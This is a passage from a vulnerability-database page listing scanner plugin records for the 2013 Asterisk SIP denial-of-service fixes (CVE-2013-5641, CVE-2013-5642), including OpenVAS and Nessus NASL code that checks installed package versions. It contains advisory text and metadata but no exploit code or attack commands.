DATABASE RESOURCES PRICING ABOUT US

{"id": "OPENVAS:1361412562310866888", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for asterisk FEDORA-2013-15567", "description": "The remote host is missing an update for the ", "published": "2013-09-18T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866888", "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html", "2013-15567"], "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "immutableFields": [], "lastseen": "2019-05-29T18:38:13", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-2961", "CPAI-2013-3492"]}, {"type": "cve", "idList": ["CVE-2013-5641", "CVE-2013-5642"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2749-1:E342B"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-5641", "DEBIANCVE:CVE-2013-5642"]}, {"type": "fedora", "idList": ["FEDORA:6763920EE9", "FEDORA:ADB8421654"]}, {"type": "freebsd", "idList": ["FD2BF3B5-1001-11E3-BA94-0025905A4771"]}, {"type": "gentoo", "idList": ["GLSA-201401-15"]}, {"type": "mageia", "idList": ["MGASA-2013-0266"]}, {"type": "nessus", "idList": ["8006.PRM", "8007.PRM", "ASTERISK_AST_2013_004.NASL", "ASTERISK_AST_2013_005.NASL", "DEBIAN_DSA-2749.NASL", "FEDORA_2013-15560.NASL", "FEDORA_2013-15567.NASL", "FREEBSD_PKG_FD2BF3B5100111E3BA940025905A4771.NASL", "GENTOO_GLSA-201401-15.NASL", "MANDRIVA_MDVSA-2013-223.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121112", "OPENVAS:1361412562310802063", "OPENVAS:1361412562310866890", "OPENVAS:1361412562310892749", "OPENVAS:866888", "OPENVAS:866890", "OPENVAS:892749"]}, {"type": "osv", "idList": ["OSV:DSA-2749-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-5641", "UB:CVE-2013-5642"]}]}, "score": {"value": -0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-2961", "CPAI-2013-3492"]}, {"type": "cve", "idList": ["CVE-2013-5641", "CVE-2013-5642"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-5642"]}, {"type": "fedora", "idList": ["FEDORA:ADB8421654"]}, {"type": "freebsd", "idList": ["FD2BF3B5-1001-11E3-BA94-0025905A4771"]}, {"type": "nessus", "idList": ["ASTERISK_AST_2013_005.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310866890", "OPENVAS:892749"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-5642"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2013-5641", "epss": "0.900290000", "percentile": "0.981740000", "modified": "2023-03-15"}, {"cve": "CVE-2013-5642", "epss": "0.553970000", "percentile": "0.970740000", "modified": "2023-03-15"}], "vulnersScore": -0.5}, "_state": {"dependencies": 1678916735, "score": 1678916296, "epss": 1678936357}, "_internal": {"score_hash": "6141eaa807c8b5fcbe696b509f5b2413"}, "pluginID": "1361412562310866888", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866888\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:05 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15567\");\n\n\n script_tag(name:\"affected\", value:\"asterisk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-15567\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "naslFamily": "Fedora Local Security Checks"}

{"fedora": [{"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2013-09-14T02:35:21", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: asterisk-11.5.1-2.fc18", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-14T02:35:21", "id": "FEDORA:ADB8421654", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2RZ5C3AZZZJ4AS7OIR6XAFFWDQJASRDJ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2013-09-14T02:37:45", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: asterisk-11.5.1-2.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-14T02:37:45", "id": "FEDORA:6763920EE9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/B34ZJSP7C7DUTOFWVJXXOADTS75M6XN4/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:09:45", "description": "\nColin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony \ntoolkit -, which could result in denial of service.\n\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\n\nWe recommend that you upgrade your asterisk packages.\n\n\n", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "osv", "title": "asterisk - several", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2022-08-10T07:09:04", "id": "OSV:DSA-2749-1", "href": "https://osv.dev/vulnerability/DSA-2749-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:58:40", "description": "Updated asterisk packages fix security vulnerabilities :\n\nA remotely exploitable crash vulnerability exists in the SIP channel driver if an ACK with SDP is received after the channel has been terminated. The handling code incorrectly assumes that the channel will always be present (CVE-2013-5641).\n\nA remotely exploitable crash vulnerability exists in the SIP channel driver if an invalid SDP is sent in a SIP request that defines media descriptions before connection information. The handling code incorrectly attempts to reference the socket address information even though that information has not yet been set (CVE-2013-5642).", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : asterisk (MDVSA-2013:223)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:asterisk", "p-cpe:/a:mandriva:linux:asterisk-addons", "p-cpe:/a:mandriva:linux:asterisk-devel", "p-cpe:/a:mandriva:linux:asterisk-firmware", "p-cpe:/a:mandriva:linux:asterisk-gui", "p-cpe:/a:mandriva:linux:asterisk-plugins-alsa", "p-cpe:/a:mandriva:linux:asterisk-plugins-calendar", "p-cpe:/a:mandriva:linux:asterisk-plugins-cel", "p-cpe:/a:mandriva:linux:asterisk-plugins-corosync", "p-cpe:/a:mandriva:linux:asterisk-plugins-curl", "p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi", "p-cpe:/a:mandriva:linux:asterisk-plugins-fax", "p-cpe:/a:mandriva:linux:asterisk-plugins-festival", "p-cpe:/a:mandriva:linux:asterisk-plugins-ices", "p-cpe:/a:mandriva:linux:asterisk-plugins-jabber", "p-cpe:/a:mandriva:linux:asterisk-plugins-jack", "p-cpe:/a:mandriva:linux:asterisk-plugins-ldap", "p-cpe:/a:mandriva:linux:asterisk-plugins-lua", "p-cpe:/a:mandriva:linux:asterisk-plugins-minivm", "p-cpe:/a:mandriva:linux:asterisk-plugins-mobile", "p-cpe:/a:mandriva:linux:asterisk-plugins-mp3", "p-cpe:/a:mandriva:linux:asterisk-plugins-mysql", "p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323", "p-cpe:/a:mandriva:linux:asterisk-plugins-osp", "p-cpe:/a:mandriva:linux:asterisk-plugins-oss", "p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql", "p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops", "p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio", "p-cpe:/a:mandriva:linux:asterisk-plugins-radius", "p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl", "p-cpe:/a:mandriva:linux:asterisk-plugins-skinny", "p-cpe:/a:mandriva:linux:asterisk-plugins-snmp", "p-cpe:/a:mandriva:linux:asterisk-plugins-speex", "p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite", "p-cpe:/a:mandriva:linux:asterisk-plugins-tds", "p-cpe:/a:mandriva:linux:asterisk-plugins-unistim", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain", "p-cpe:/a:mandriva:linux:lib64asteriskssl1", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2013-223.NASL", "href": "https://www.tenable.com/plugins/nessus/69540", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:223. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69540);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"MDVSA\", value:\"2013:223\");\n\n script_name(english:\"Mandriva Linux Security Advisory : asterisk (MDVSA-2013:223)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated asterisk packages fix security vulnerabilities :\n\nA remotely exploitable crash vulnerability exists in the SIP channel\ndriver if an ACK with SDP is received after the channel has been\nterminated. The handling code incorrectly assumes that the channel\nwill always be present (CVE-2013-5641).\n\nA remotely exploitable crash vulnerability exists in the SIP channel\ndriver if an invalid SDP is sent in a SIP request that defines media\ndescriptions before connection information. The handling code\nincorrectly attempts to reference the socket address information even\nthough that information has not yet been set (CVE-2013-5642).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-cel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-corosync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-fax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-festival\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jabber\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-lua\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-minivm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mobile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mp3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-osp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-oss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-radius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-skinny\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-speex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-tds\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-unistim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64asteriskssl1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-addons-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-devel-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-firmware-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-gui-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-alsa-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-calendar-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-cel-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-corosync-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-curl-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-dahdi-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-fax-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-festival-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ices-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jabber-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jack-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ldap-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-lua-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-minivm-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mobile-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mp3-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mysql-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ooh323-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-osp-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-oss-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pgsql-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pktccops-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-portaudio-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-radius-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-saycountpl-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-skinny-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-snmp-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-speex-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-sqlite-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-tds-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-unistim-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-imap-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-plain-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64asteriskssl1-11.5.1-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:59:37", "description": "- Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-1 :\n\n - The Asterisk Development Team has announced security releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2, 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-09-14T00:00:00", "type": "nessus", "title": "Fedora 19 : asterisk-11.5.1-2.fc19 (2013-15560)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2013-15560.NASL", "href": "https://www.tenable.com/plugins/nessus/69886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 